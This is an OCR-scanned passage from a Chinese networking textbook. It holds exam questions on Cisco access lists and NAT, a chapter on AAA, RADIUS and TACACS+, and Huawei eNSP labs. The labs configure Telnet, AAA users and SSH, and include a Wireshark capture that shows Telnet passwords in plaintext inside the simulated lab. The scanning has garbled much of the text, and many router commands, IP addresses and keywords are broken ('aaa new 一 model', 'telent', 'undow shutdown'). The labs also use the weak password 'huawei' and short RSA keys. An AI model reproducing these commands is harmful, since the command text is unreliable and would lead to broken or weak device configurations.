C. access-list 101 deny tcp host 10. 1. 0. 10 172. 168. 0. 0 0. 0. 0. 255 eq ftp 
D. access-list 101 permit tcp host 10. 1. 0. 10 172. 168. 0. 0 0. 0. 0. 255 eq ftp 
21. 计 费 服务 器 的 IP 地 址 在 192. 168. 1. 0/24 子 网 内 ,为 了 保证 计 费 服务 器 的 安全 ， 
不 允许 任何 用 户 Telnet 到 该 服务 器 ,需要 配置 的 访问 控制 列表 为 ( 入 
A. access-list 101 deny tcp 192. 168. 1. 0 0. 0. 0. 255 eq telnet 


access-list 101 permit ip any any 











B. access-list 101 deny tcp any 192. 168. 1. 0 eq telnet 
access-list 101 permit ip any any 

C. access-list 101 deny udp 192. 168. 1. 0 0. 0. 0. 255 eq telnet 
access-list 101 permit ip any any 

D. access-list 101 deny tcp any 192. 168. 1.0 0. 0. 0. 255 eq telnet 
access-list 101 permit ip any any 


22. 配置 访问 控制 列表 如 下 所 示 ,在 该 规则 中 any 的 含义 是 ( 5 


Router(config) # access- list 101 permit ip any 192.168.1.0 0.0.0.255 eq ftp 


A. 检查 源 地 址 的 所 有 比特 位 B. 检查 目标 地 址 的 所 有 比特 位 
C. 允许 所 有 的 源 地 址 D. 允许 255. 255. 255. 255 0. 0. 0.0 


23. 创建 一 个 扩展 访问 控制 列表 101, 将 它 应 用 到 端口 上 的 命令 是 ( )。 
A. Router(config-if)# permit access-list 101 out 
B. Router(config-if)#ip access-group 101 out 
C. Router(config-if) # access-list 101 out 
D. Router(config-if)#apply access-list 101 out 
24， 以 下 描述 中 ,关于 网 络 地 址 转换 不 正确 的 是 ( ”)。 
A. 网 络 地 址 转换 (NAT) 不 可 以 有 效 地 隐藏 内 部 局 域 网 中 的 主机 ,但 却 是 一 种 
有 效 的 网 络 安全 保护 技术 
B. 一 个 局 域 网 内 部 有 很 多 主机 ,但 不 能 保证 每 台 主 机 都 拥有 合法 的 共有 IP 地 


25. 


26. 


27. 


28. 


29. 


30. 


31. 


32. 


33. 








址 ,为 了 实现 所 有 的 内 部 主机 都 可 以 连接 到 互联 网 ,可 以 使 用 网 络 地 址 转换 


技术 (NAT) 
C. 网 络 地 址 转换 技术 是 在 IP 地 址 日 益 短缺 的 情况 下 提出 的 


D. 网 络 地 址 转换 技术 (NAT) 可 以 按照 用 户 的 需要 ,在 局 域 网 内 部 提供 给 外 部 


FTP、Web 和 Telnet 服务 
静态 NAT 技术 的 优点 是 ( Ys 


A. 节约 IP 地 址 B. 隐藏 真实 IP 地 址 
C. 端口 转换 D. 代理 

动态 NAT 技术 的 优点 是 ( hs 

A. 节约 IP 地 址 B. 隐藏 真实 IP 地 址 
C. 端口 转换 D. 代理 
端口 多 路 复 用 NAT 技术 的 优点 是 ( 久 

A. 节约 IP 地 址 B. 隐藏 真实 IP 地 址 
C. 端口 转换 D. 代理 

客户 机 从 内 网 向 外 网 发 数据 包 , 经 过 NAT 后 ,修改 了 ( Ys 
A. 源 IP 地 址 B. 目的 IP 地 址 

C. 端口 号 D. 协议 类 型 


以 下 描述 中 ,不 属于 网 络 地 址 转换 的 配置 是 ( » 
A. 定义 一 个 访问 控制 列表 ,规定 什么 样 的 主机 可 以 访问 
,根据 选择 的 方式 ,定义 合适 的 内 部 服务 器 
. 采用 地 址 池 方 式 提供 私有 地 址 
.根据 局 域 网 的 需要 ,定义 合适 的 内 部 服务 器 
) 用 来 规定 数据 包 需 要 进行 地 址 转换 。 
. 在 线 用 户 表 B. 访问 控制 列表 
.MAC 地 址 表 D. 路 由 表 
关于 NAT 技术 ,以 下 描述 正确 的 是 ( Ye 
A. 不 是 所 有 的 数据 流量 都 要 经 过 NAT 网 关 才 能 发 出 
B. 网 络 内 部 使 用 保留 地 址 
C. 应 用 程序 将 经 过 地 址 转换 后 的 数据 包 发 给 NAT,NAT 再 发 出 
D. 内 部 地 址 需要 和 外 部 地 址 一 一 对 应 ,才能 实现 地 址 转换 
当 运 行 NAPT 时 ,地 址 复 用 的 用 途 是 ( is 
A. 限制 可 以 连接 到 WAN 的 主机 数量 
B. 允许 多 个 内 部 地 址 共享 一 个 全 局 地 址 
C. 限制 主机 等 待 可 用 地 址 
D. 允许 外 部 主机 共享 内 部 全 局 地 址 
命令 ip nat inside source static 10. 1. 1.1 172. 16. 0.1 的 作用 是 ( 
A. 为 所 有 的 外 部 NAT 创建 一 个 全 局 的 地 址 池 
B. 为 内 部 的 静态 地 址 创建 动态 的 地 址 池 


fF 
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C. 为 所 有 内 部 本 地 NAT 创建 了 动态 源 地 址 转换 
D. 为 内 部 本 地 地 址 和 内 部 全 局 地 址 创建 一 对 一 的 映射 关系 


二 、 填 空 题 
访问 列表 的 三 种 类 型 是 和 
三 、 简 答题 





1. 创建 扩展 IP 访问 列表 的 步骤 是 什么 ? 
2. 网 络 地 址 转换 的 实现 方式 有 哪 三 种 ? 


四 、 操 作 题 


1. 你 是 某 公 司 的 网 络 管理 员 ,和 欲 发 布 公司 的 Web 服务 。 现 要 求 将 内 网 Web 服务 器 
IP 地 址 映射 为 全 局 IP 地 址 ,实现 外 部 网 络 可 以 访问 公司 内 部 Web 服务 器 。 网 络 拓扑 图 
如 图 16-16 所 示 。 


200.200.200.0 S 0/0 





Server0 PCO 
Web 有 服务 器 210.210.210.2 
192.168.1.2/24 


图 16-16 操作 题 1 网 络 拓扑 图 


2. 你 是 某 公司 的 网 络 管理 员 , 公 司 办 公 网 需要 接 入 互联 网 ,公司 只 向 ISP 申请 了 一 
条 专线 ,该 专线 分 配 了 一 个 公 网 IP 地 址 ,配置 实现 全 公司 的 主机 都 能 访问 外 网 。 网 络 拓 
扑 图 如 图 16-17 所 示 。 


200.200.200.0 S 0/0 
0/0 





192.168.1.3/24 Server0 
210.210.210.2 


192.168.1.2/24 


图 16-17 操作 题 2 网 络 拓扑 图 


17.1 用 户 需 求 与 分 析 


当 网 络 不 断 扩大 ,网 络 安全 的 重要 性 和 管理 的 复杂 性 随 之 增加 。 由 于 身份 安全 与 访 
问 管理 变 得 日 益 复杂 ,就 需要 对 网 络 中 的 资源 进行 保护 ,以 免 有 人 在 未 经 授权 的 情况 下 对 
网 络 进行 访问 。 


17.2 预备 知识 


人 2 1 AAA 的 概念 


AAA 是 Authentication( 验 证 )、Authorization( 授 权 ) 和 Accounting( 审 计 ) 的 简称 ， 
它 提供 了 验证 ,授权 和 审计 三 种 安全 功能 。AAA 可 以 通过 多 种 协议 来 实现 ,目前 华为 设 
备 支 持 基于 RADIUS(Remote Authentication Dial-In User Service) 协 议 或 HWTACACS 
(Huawei Terminal Access Controller Access Control System) 协 议 来 实现 AAA。 

验证 : 这 个 用 户 是 谁 ( 身 份 )。 用 户 和 管理 员 必 须 证 明 他 们 的 身份 才 可 以 对 资源 进行 
访问 ,证 明 的 方式 可 以 是 用 户 名 和 密码 组 合 ,可 以 是 响应 问题 ,也 可 以 是 令 牌 卡 等 。 

授权 : 这 个 用 户 能 做 什么 (服务 )。 用 户 得 到 验证 后 ,授权 服务 决定 用 户 可 以 访问 哪 
些 资源 以 及 允许 用 户 进行 哪些 操作 。 

审计 : 这 个 用 户 做 了 什么 (审计 )。 审 计 功 能 记录 了 用 户 做 了 什么 .访问 了 哪些 资源 、 
访问 的 时 长 .时间 ,以 及 做 了 哪些 改动 。 

需要 注意 的 是 ,可 以 在 没有 授权 的 情况 下 使 用 验证 功能 ,可 以 在 没有 审计 的 情况 下 使 
用 验证 功能 ,但 不 可 以 在 没有 验证 的 情况 下 使 用 授权 功能 ,也 不 可 以 在 没有 验证 的 情况 下 
使 用 审计 功能 ,授权 和 审计 是 平行 关系 , 互 不 影响 。 


公 22 AAA 验证 的 分 类 与 配置 方法 


AAA 验证 决定 用 户 是 否 可 以 获得 网 络 访问 的 权限 。AAA 支持 的 验证 方式 包括 : 不 
验证 ,本 地 验证 和 基于 服务 器 的 验证 (又 称 为 远 端 验证 ) 。 
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本 地 AAA 验证 使 用 一 个 本 地 数据 库 对 用 户 进行 验证 。 这 种 方法 是 在 路 由 器 上 本 地 
存放 用 户 名 和 密码 ,使 用 本 地 数据 库 验 证 用 户 。 本 地 AAA 验证 是 小 型 网 络 的 理想 选择 。 
本 地 AAA 验证 的 方法 与 使 用 login local 命令 相似 。 

配置 本 地 AAA 验证 有 以 下 4 个 步骤 。 

(1) 为 管理 需要 接 人 路 由 器 的 用 户 在 本 地 路 由 器 数据 库 中 加 入 用 户 名 和 密码 。 

(2) 在 路 由 的 全 局 模式 下 启用 AAA。 

(3) 在 路 由 器 上 配置 AAA 参数 。 

(4) 对 AAA 配置 进行 确认 和 故障 排除 。 

在 思科 路 由 器 上 配置 本 地 AAA 验证 的 具体 命令 如 下 。 

Rl#conf 七 

R1(config) # username guol secret cisco 

R1(config) # aaa new 一 model 

R1(config) # aaa authentication login default local - case enable 

R1(config) # aaa authentication login telnet - login local - case 

Ri(config)#1ine vty0 4 

R1(config) # login authentication telnet - login 

基于 服务 器 的 AAA 验证 使 用 RADIUS 或 TACACS 十 协议 的 外 部 数据 库 服务 器 资 
源 ,如 使 用 Windows Server 的 思科 安全 访问 控制 服务 器 (ACS)。 如 果 是 一 个 大 型 网 络 ， 
有 很 多 台 需 要 管理 的 设备 ,基于 服务 器 的 AAA 服务 器 验证 是 更 合适 的 选择 。 这 是 因为 
本 地 AAA 认证 的 扩展 性 不 好 , 当 一 个 企业 使 用 多 台 思 科 服 务 器 和 多 个 网 络 管理 员 ,这 时 
需要 在 每 台 路 由 器 上 建立 多 个 管理 员 的 账户 ,这 种 方法 无 疑 是 不 可 行 的 。 

思科 基于 服务 器 的 AAA 验证 主要 使 用 两 种 通信 协议 : RRADIUS 和 TACACS 十 。 
这 两 种 协议 的 区 别 是 ,RADIUS 是 一 种 公有 协议 ,RADIUS 代理 验证 具有 可 扩展 性 ,将 
RADIUS 验证 和 授权 结合 为 一 个 过 程 ,只 加 密 密 码 ,使 用 UDP 端口 1645 和 1812 做 认 
证 ,UDP 端口 1646 和 1813 做 设计 ,支持 远程 访问 技术 .802. 1X 和 ISP。TACACS 十 是 
思科 私有 协议 ,不 兼容 TACACS 和 XTACACS, 验 证 和 授权 分 离 , 加 密 所 有 通信 ,使 用 
TCP 端口 49。 


亿 23 授权 的 基本 概念 


授权 用 来 指定 授权 用 户 可 以 访问 或 使 用 网 络 上 哪些 服务 , 当 用 户 成 功 通过 了 所 选择 
的 AAA 数据 库 验 证 后 ,他 们 就 被 授权 使 用 特定 的 网 络 资源 。 总 的 来 说 ,授权 就 是 用 户 经 
过 验证 后 在 网 络 上 能 做 什么 和 不 能 做 什么 ,类 似 于 特权 级 别 。 授 权 是 自动 进行 的 ,不 需要 
用 户 在 验证 后 执行 额外 的 步骤 ,授权 紧 跟 在 用 户 验证 后 实现 。AAA 支持 的 授权 方式 包 
括 不 授权 、 本 地 授权 和 服务 器 授权 (也 称 为 远 端 授权 )。 


亿 24 审计 的 基本 概念 


审计 的 作用 是 记录 用 户 使 用 资源 的 情况 。 审 计时 收集 的 报告 和 数据 方便 对 用 户 进行 
审计 或 计 费 。 收 集 的 数据 可 能 包括 连接 的 开始 和 结束 时 间 执行 的 命令 ,数据 包 数 量 以 及 
字 节 数 。 这 些 信 息 在 对 设备 进行 故障 排除 时 很 有 用 ,也 提供 了 应 对 进行 恶意 活动 个 人 的 
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有 效 手 段 。AAA 支持 的 审计 方式 包括 不 审计 和 服务 器 审计 (也 称 为 远 端 审计 ) 。 

企业 级 的 验证 服务 器 包括 Funk 的 Steel-Belted RADIUS 服务 器 、Livingston 
Enterprises 的 RADIUS 验证 计 费 管理 器 (ABM) 、Merit Network 的 RADIUS 服务 器 ,这 
些 都 是 业界 比较 有 名 的 产品 ,但 它们 不 能 将 RADIUS 和 TACACS 十 结合 成 一 个 解决 方 
案 , 而 思科 的 ACS 可 以 全 面 支持 这 两 种 协议 ,同时 为 RADIUS 和 TACACS 十 提供 一 个 
单一 的 AAA 解决 方案 。 

思科 安全 ACS 是 一 种 高 可 扩展 、 高 性 能 的 接 入 控制 服务 器 ,可 被 用 在 支持 RADIUS 和 
TACACS 十 或 同时 支持 这 两 者 的 网 络 中 控制 所 有 网 络 设备 的 管理 接 入 和 配置 。 

思科 安全 ACS 具有 以 下 优点 。 

(1) 在 集中 式 身 份 标识 网 络 解决 方案 中 ,使 用 策略 控制 结合 验证 对 管理 员 用 户 的 接 
入 安全 进行 管理 。 

(2) 提供 了 更 多 的 活动 性 和 机 动 性 ,增强 的 安全 性 以 及 用 户 生产 力 增益 。 

(3) 无 论 用 户 如 何 接 入 网 络 , 对 所 有 用 户 采 用 统一 的 安全 策略 。 

(4) 减少 在 扩展 用 户 和 管理 员 对 网 络 接 入 时 所 需 的 管理 工作 和 运营 负担 。 

思科 安全 ACS 支持 以 下 多 种 高 级 特性 。 

(1) 自动 服务 监测 。 

(2) 数据 库 同步 和 为 大 规模 部 署 引入 工具 。 

(3) LDAP 用 户 验 证 支持 。 

(4) 用 户 接 入 和 管理 性 接 入 报告 。 

(5) 基于 一 定 标准 限制 网 络 接 入 ,如 基于 一 天 中 的 某 段 时 间或 一 周 中 某 些 天 。 

(6) 用 户 和 设备 组 档案 。 

需要 注意 的 是 ,华为 的 AAA 服务 器 需要 通过 域 来 对 用 户 进 行 管理 ,不 同 的 域 可 以 关 
联 不 同 的 验证 ,授权 和 审计 方案 。 


17.3 方案 设计 


方案 设计 如 表 17-1 所 示 。 
表 17-1 方案 设计 





任务 名 称 | AAA 部 署 与 配置 

1. 利用 eNSP 模拟 实现 AAA 服务 器 的 部 署 与 配置 

(1) AAA 服务 器 验证 方案 的 创建 

(2) AAA 服务 器 授权 方案 的 创建 

(3) 用 户 等 级 设置 

(4) 验证 模式 更 改 

2. 利用 eNSP 模拟 实现 AAA 服务 器 与 Telnet 的 综合 部 署 与 配置 
(1) 华为 路 由 器 常见 命令 的 使 用 

(2) Telnet 和 Console 端口 验证 方式 的 设置 





任务 分 解 
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续 表 





(3) AAA 服务 上 用 户 等 级 和 服务 类 型 的 设置 

(4) 利用 Wireshark 软件 捕获 Telnet 用 户 名 和 密码 

3. 利用 eNSP 模拟 实现 AAA 服务 器 与 STelnet 的 综合 部 署 与 配置 
任务 分 解 | (1) 电子 证 书 的 创建 

(2) 远程 登录 验证 模式 的 查看 

(3) 用 户 登录 类 型 的 设置 

(4) STelnet 服务 的 开启 


. 熟悉 eNSP 中 路 由 器 常见 命令 的 使 用 

. 能 创建 AAA 服务 器 的 验证 方案 

.能 创建 AAA 服务 器 的 授权 方案 

. 能 设置 域 的 验证 方案 和 授权 方案 

. 能 在 域 中 创建 基本 账户 

.能 设置 用 户 等 级 

.能 更 改 验证 模式 

.能 使 用 Wireshark 软件 在 eNSP 中 捕获 Telnet 的 用 户 名 和 密码 
. 能 实现 AAA 服务 器 和 Telnet 的 综合 部 署 与 配置 

10. 能 实现 AAA 服务 器 和 STelnet 的 综合 部 署 与 配置 


. 掌握 AAA 的 基本 概念 

.熟悉 AAA 支持 的 验证 方式 

. 熟悉 配置 AAA 验证 的 基本 步骤 
了 解 AAA 验证 使 用 的 通信 协议 
. 了解 授权 的 基本 概念 

. 了解 审 计 的 基本 概念 


培养 吃苦 耐劳 ,实事 求 是 一丝不苟 的 工作 态度 
树立 较 强 的 安全 意识 

. 培养 良好 的 职业 道德 

.培养 分 析 能 力 和 应 变 能 力 

. 具有 可 持续 发 展 能 力 





能 力 目标 


omDam own 上 





知识 目标 


Pamir 





素质 目标 


Tr 








17.4 项 目 实施 


亿 41 任务 1: 利用 eNSP 模 拟 实现 AAA 服务 器 的 部 署 与 配置 
1. 任务 目标 
掌握 AAA 服务 器 的 部 署 和 配置 。 
2. 工作 任务 
(1) AAA 服务 器 验证 方案 的 创建 。 








(2) AAA 服务 器 授权 方案 的 创建 。 
(3) 用 户 等 级 设置 。 
(4) 验证 模式 更 改 。 


3. 工作 环境 


(1) Windows 7 系统 的 主机 。 
(2) 主机 中 预 装 eNSP 软件 。 


4. 任务 分 析 


利用 eNSP 软件 模拟 AAA 服务 器 配置 ,拓扑 图 如 图 17-1 所 示 。 路 由 器 AR1 通过 
AAA 验证 能 够 远程 登录 到 AR2 上 。 路 由 器 端口 IP 地 址 信息 如 表 17-2 所 示 。 


192.168.1.0/24 


WS GOo0 G ry 


ARL AR2 
AAA 服务 器 


图 17-1 任务 1 AAA 服务 器 配置 拓扑 图 
表 17-2 任务 1 路 由 器 端口 IP 地 址 信息 表 














设备 名 称 ARI1 端口 G 0/0/0 AR2 端口 G 0/0/0 
IP 地 址 192. 168.1.1 192. 168.1.2 
子 网 掩 码 255. 255. 255. 0 255. 255. 255. 0 


5. 实施 过 程 


(1) 路 由 器 与 路 由 器 之 间 使 用 直通 线 相连 。 
(2) 配置 路 由 器 AR1 ,命令 如 下 。 


< Huawei > system — view // 进 入 系统 视图 界面 
[Huawei]sysname RR1 // 把 路 由 器 改名 为 AR1 
[AR1 ] interface gigabitethernet 0/0/0 // 打 开路 由 器 6 0/0/0 端口 
[AR1 - GigabitEthernet0/0/0]ip address 192.168.1.1 24 // 配 置 IP 地 址 

(3) 配置 路 由 器 AR2 ,命令 如 下 。 

< Huawei > SYstenm — View 

[Huawei]sysname AR2 // 把 路 由 器 改名 为 AR2 
[AR2]interface gigabitethernet0/0/0 // 打 开路 由 器 G 0/0/0 端口 
[AR2 - GigabitEthernet0/0/0]ip address 192.168.1.2 24 // 配 置 IP 地址 

[AR2 — GigabitEthernet0/0/0]quit // 退 出 端口 模式 


(4) 对 网 络 连通 性 的 检查 与 测试 。 在 AR1 上 使 用 ping 命令 ,可 以 Ping 通 AAA 服 
务 器 AR2。 
(5) 在 路 由 器 AR2 上 配置 AAA ,命令 如 下 。 
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< AR2 > System 一 View 
[AR2]aaa 
[AR2 - aaa]authentication - scheme S1 // 创 建 验证 方案 S1 
[AR2 - aaa- authen- S1]authentication — mode local 
// 华 为 的 AAA 认证 包括 不 验证 .本 地 验证 .RADIUS 验证 和 HWTACACS 认证 ,本 实验 采用 本 地 验证 
[RAR2 -aaa— authen— Sl]quit 
[AR2 - aaa]authorization — scheme S2 // 创 建 授权 方案 S2 
[AR2 - aaa ~ author — S2]authorization - mode local 
// 华 为 的 AAA 授权 包括 不 授权 、 本 地 授权 、 远 端 授权 ,该 实验 采用 本 地 授权 模式 
[AR2 -aaa- author — S2]quit 


[AR2 — aaa]domain HUAWEI // 创 建 域 HUAWEI 
[AR2 - aaa — domain - huawei]authorization — scheme S2 // 设 置 授权 方案 S2 
[AR2 - aaa — domain - huawei]authentication - scheme S1 /人 /设置 验证 方案 S1 


[RR2 - aaa— domain - huawei]quit 
[AR2 - aaa]local - user admin(@HUAWEI password cipher huawei 

// 在 HUMWEI 域 中 创建 本 地 用 户 admin@HUAWEI, 密码 为 huawei, 存放 方式 为 加 密 存 放 
[AR2 - aaa]local - user admin(@HUAWEI service - type telnet // 设 置 AAA 服务 器 为 用 户 admin 开 
// 启 Telnet 服务 
[AR2 - aaa]local - user admin(@HUAWEI privilege level 15 // 设 置 admin 的 用 户 等 级 为 15 
[AR2 - aaa]display this // 查 看 AAA 服务 器 的 配置 情况 
[AR2 - aaal]quit 
[RAR2]user - interface vty 0 4 
[AR2 - ui- vty0 ~ 4]authentication 一 mode aaa // 更 改 认 证 模式 为 AAA 验证 


(6) 在 路 由 器 AR1 上 验证 AR2 上 的 AAA 配置 ,命令 如 下 。 





<RR1 > telnet 192.168.1.2 


需要 输入 用 户 名 admin@HUAWEI, 密 码 为 “huawei”, 顺 利 进入 路 由 器 AR2, 说 明 
AR2 的 AAA 配置 成 功 。AR1 需要 通过 AAA 验证 才能 远程 登录 到 路 由 器 AR2。 


亿 42 任务 2: 利用 ehNSP 模 拟 实现 AAA 服务 器 与 Tenet 的 综合 部 署 
与 配置 


1. 任务 目标 


掌握 华为 路 由 器 常见 命令 的 使 用 方法 ,了 解 AAA 服务 器 的 连接 和 简单 设置 ,掌握 
Telnet 的 配置 方法 。 


2. 工作 任务 


(1) 华为 路 由 器 常见 命令 的 使 用 。 

(2) Telnet 和 Console 端口 验证 方式 的 设置 。 

(3) AAA 服务 上 用 户 等 级 和 服务 类 型 的 设置 。 

(4) 利用 Wireshark 软件 捕获 Telnet 用 户 名 和 和 密码。 


3. 工作 环境 


(1) Windows 7 系统 的 主机 。 








(2) 主机 中 预 装 eNSP 软件 。 
4. 任务 分 析 


利用 eNSP 软件 模拟 AAA 服务 器 配置 ,拓扑 图 如 图 17-2 所 示 , 路 由 器 AR2 通过 
AAA 验证 能 够 远程 登录 到 AR2 上 。 路 由 器 端口 IP 地 址 信息 如 表 17-3 所 示 。 


10.1.1.1/8 10.1.1.2/8 
Way G 0/0/0 E 0/0/1 | E 0/0/2 G vy 


es 
AR1 LSWI1 AR2 


图 17-2 任务 2 AAA 服务 器 配置 拓扑 图 
表 17-3 任务 2 路 由 器 端口 IP 地 址 信息 表 








设备 名 称 AR1 端口 G 0/0/0 AR2 端口 G 0/0/0 
IP 地址 10.1.1.1 1011.2 
子 网 掩 码 255. 0.0.0 255. 0.0.0 








5. 实施 过 程 


(1) 路 由 器 与 路 由 器 之 间 使 用 直通 线 相连 。 
(2) 熟悉 路 由 器 AR1 的 常见 命令 使 用 方法 ,具体 配置 如 下 。 


< Huawei > system — view 


[Huawei]sysname RAR1 // 把 路 由 器 改名 为 RR1 

[RAR1]display version // 显 示 路 由 器 的 版 本 信息 

[RAR1]display interface G 0/0/0 // 查 看 接口 6 0/0/0 的 信息 ,了 解 
// 端 口 的 状态 是 up 还 是 down 

[AR1 ]interface gigabitethernet 0/0/0 // 打 开路 由 器 G 0/0/0 端口 

[RAR1 - GigabitEthernet0/0/0]undow shutdown // 开 启 端口 

[RAR1 - GigabitEthernet0/0/0]ip address 10.1.1.18 // 配 置 IP 地 址 

[AR1 - GigabitEthernet0/0/0]display this // 显 示 当 前 端口 的 配置 

[AR1 - GigabitEthernet0/0/0]display ip interface brief // 查 看 路 由 器 所 有 端口 的 IP 地 址 

[AR1 - GigabitEthernet0/0/0]display ip routing - table // 查 看 路 由 表 


[AR1 - GigabitEthernet0/0/0]display current - configuration// 查 看 当前 的 配置 信息 

[AR1 - GigabitEthernet0/0/0]return 

<RR1> save // 保 存 所 有 的 配置 信息 ,提示 “are you sure to continue?(y/n)[n]:” 时 ,输入 y 
< RR1 > display saved — configuration // 查 看 保存 的 配置 信息 ,存放 在 flash 中 

< RAR1 > dir flash: // 可 以 查看 到 已 经 保存 的 配置 文件 vrpcfg. zip 
< AR1 > reboot // 重 启 路 由 器 ,所 有 的 配置 信息 还 在 


(3) 配置 路 由 器 AR1. 使 网 络 管理 员 可 以 从 路 由 器 AR2 远程 登录 到 路 由 器 AR1 进 
行 配置 ,而 不 是 只 能 通过 Console 端口 配置 路 由 器 AR1, 具 体 配置 命令 如 下 。 

< RR1 > system— view 

[aAR1]display ip interface brief // 查 看 路 由 器 端口 的 IP 地址 配置 信息 


[RaR1]user - interface vty 0 4 // 配 置 Telnet 
[AR1 — ul — vty0 ~ 4]authentication — mode password 
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Please configure the login password (maximum length 16) :huawei // 采 用 密码 方式 验证 ,配置 密 
// 码 为 huawei 

[AR1 ~ ul — vty0 -4]quit 

[AR1]user - interface console 0 // 配 置 Console 端口 

[AR1 - ul - console0]authentication — mode password 

Please configure the login password (maximum length 16) :huawei // 采 用 密码 方式 验证 ,配置 密 
// 码 为 huawei 


(4) 在 路 由 器 AR2 上 进行 远程 登录 验证 ,具体 配置 命令 如 下 。 


< Huawei > system 一 View 

[Huawei]sysname AR2 // 把 路 由 器 改名 为 AR2 
[AR2]interface gigabitethernet 0/0/0 // 打 开路 由 器 6 0/0/0 端口 

[AR2 - GigabitEthernet0/0/0]display ip interface brief 

// 可 以 看 到 华为 路 由 器 的 端口 默认 是 打开 的 ,因此 不 使 用 undo shutdown 命令 ,与 思科 路 由 器 不 同 
[AR2 - GigabitEthernet0/0/0]ip address 10.1.1.2 8 // 配 置 IP 地 址 

[AR2 - GigabitEthernet0/0/0]display ip interface brief // 查 看 端口 的 IP 地 址 是 否 配置 成 功 
[AR2 - GigabitEthernet0/0/0]ping -c 100 10.1.1. 

//Ping 100 次 路 由 器 R1, 中 途 可 以 用 Ctrl+C 键 停止 当前 命令 的 执行 


[AR2 - GigabitEthernet0/0/0]quit // 退 出 端口 模式 
<AR2> telnet 10.1.1.1 
Password: huawei // 输 入 密码 huawei 


<AR1> sys // 发 现 无 法 输入 ,并 且 可 以 运行 的 命令 非常 少 ,这 是 因为 用 户 的 等 级 问题 
(5) 在 路 由 器 AR1 上 进行 用 户 等 级 设置 ,具体 配置 命令 如 下 。 


[RAR1 - ul - console0]quit 

<RR1> display user- interface 

// 可 以 看 到 Console 的 用 户 等 级 是 15, 可 以 执行 所 有 的 命令 ,因为 命令 的 等 级 只 有 0 一 3, 但 是 
// 如 果 没 有 单独 配置 VTY, 用 户 等 级 是 0, 可 以 执行 的 命令 非常 少 ,因此 需要 更 改 VTY 的 用 户 等 级 
< RR1 > system— view 

[RAR1]user - interface vty0 4 

[aR1 - ul - vty0 - 4]user privilege level 15 // 更 改 用 户 的 等 级 为 15 


(6) 再 次 在 路 由 器 AR2 上 进行 远程 登录 验证 ,具体 配置 命令 如 下 。 


<AR1>ctrl+] // 使 用 ctrl+ ] 键 退出 AR1, 重 新 从 AR2 远程 登录 

<AR2> telnet 10.1.1.1 

Password:huawei // 输 入 密码 huawei 
<AR1>? // 登 录 到 ARl 后 发 现 此 时 可 以 使 用 的 命令 有 很 多 , 远程 登录 成 功 

< RR1 > system - view 

[AR1] 


(7) 在 路 由 器 AR1 上 进行 AAA 验证 模式 的 设置 ,具体 配置 命令 如 下 。 


[RaR1 — ul — vty0 — 4]authentication — mode aaa 

[AR1 ~ ul — vty0 — 4]quit 

[AR1 ]aaa 

[AR1 - aaa]local ~ user admin password cipher huawei // 创 建 本 地 用 户 和 加 密 密 码 
[AR1 - aaa]local — user admin privilege level 15 // 设 置 用 户 等 级 为 15 
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[AR1 - aaa]local — user admin service 一 type telent // 设 置 用 户 的 类 型 
[AR1 - aaa]display this // 查 看 路 由 器 上 的 AAA 配置 


(8) 在 路 由 器 AR2 上 重新 进行 远程 登录 ,具体 配置 命令 如 下 。 


[AR1]Ctrl+] // 使 用 Ctrl + ] 键 退出 AR1, 重新 从 AR2 远程 登录 
< AR2> telnet 10.1.1.1 
Username:admin // 此 时 需要 输入 用 户 名 admin 
Password:huawei ”// 输 入 密码 huawei 
<RR1 > system— view 
[AR1 ]display users 
// 可 以 查看 到 用 户 用 什么 方式 连接 上 去 ,是 用 Console 方式 还 是 用 远程 登录 方式 
[AR1]quit // 退 出 连接 


(9) 利用 Wireshark 软件 对 Telnet 过 程 进 行 抓 包 。 右 击 交 换 机 ,选择 “数据 抓 包 ” 一 
ethernet 0/0/1 命令 。 重 启 Telnet 一 次 ,然后 在 Wireshark 软件 内 右 击 捕获 的 数据 包 , 选 
择 Follow TCP Stream 选项 可 以 看 到 Telnet 的 用 户 名 和 密码 。 


亿 43 任务 3: 利用 eshSP 模 拟 实现 AAA 服务 器 与 Sind 的 综合 部 署 


与 配置 
1. 任务 目标 
由 于 Telnet 传输 明文 的 账户 和 密码 ,缺少 安全 性 ,因此 需要 掌握 STelnet 的 配置 
方法 。 
2. 工作 任务 


(1) 电子 证 书 的 创建 。 

(2) 远程 登录 验证 模式 的 查看 。 
(3) 用 户 登 录 类 型 的 设置 。 

(4) STelnet 服务 的 开启 。 


3. 工作 环境 


(1) Windows 7 系统 的 主机 。 
(2) 主机 中 预 装 eNSP 软件 。 


4. 任务 分 析 


利用 eNSP 软件 模拟 AAA 服务 器 配置 ,拓扑 图 如 图 17-3 所 示 。 路 由 器 AR1 通过 
AAA 验证 能 够 远程 登录 到 AR2 上 。 路 由 器 端口 IP 地 址 信息 如 表 17-4 所 示 。 


10.1.1.1/8 10.1.1.2/8 
民 , G0/0/0 E 0/0/1 | E 0/0/2 G oy 


ARI1 LSWI1 AR2 
图 17-3 任务 3 AAA 服务 器 配置 拓扑 图 
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表 17-4 任务 3 路 由 器 端口 IP 地 址 信息 表 




















设备 名 称 ARI1 端口 G 0/0/0 AR2 端口 G 0/0/0 
IP 地址 WlL!l 10:T.1.2 
子 网 掩 码 255. 0.0.0 255. 0.0.0 


(1) 在 路 由 器 AR1 上 配置 STelnet, 命 令 如 下 。 


< RR1 > disp rsa local ~ key - pair public // 查 看 是 否 有 电子 证 书 

<RR1 > system— view 
RR1]rsa local — key - pair create // 若 没有 电子 证 书 则 创建 一 个 

Confirm to replace them? (y/n)[n]:y // 输 入 y 

Input the bite in the modulus[ default = 512]:1024 // 输 入 密 钥 长 度 ,默认 是 512, 建议 输入 1024 
RR1]disp rsa local — key— pair public // 查 看 上 面 的 操作 是 否 产生 电子 证 书 


ARl Juser - interface vty 0 4 


[AR1 -ui-vty0-4]display this // 查 看 远程 登录 的 验证 模式 ,确认 验证 模式 为 AAA 验证 


[AR1 - ui— vty0 - 4]protocol inbound ssh // 把 协议 改 成 SSH 而 不 是 过 去 的 Telnet 
[aR1 - ui- vty0 - 4]aaa // 回 到 AAA 验证 
RR1 - aaa]display this // 查 看 之 前 的 设置 


AR1 - aaa]local - user admin service 一 type ssh // 更 改 服务 类 型 为 SSH 

RR1 - aaalquit 

RR1]ssh user admin authentication - type password // 设 置 SSH 的 用 户 名 是 admin, 验证 方式 是 密码 

AR1]display ssh user - information // 查 看 确认 SSH 的 用 户 信 息 和 认证 方式 是 否 正确 

AR1]display ssh server status // 查 看 SSH 的 服务 状态 , 发现 SFTP 和 STelnet server 的 状态 
// 均 是 Disable 

[RAR1 ] stelnet server enable // 启 用 STelnet 服务 


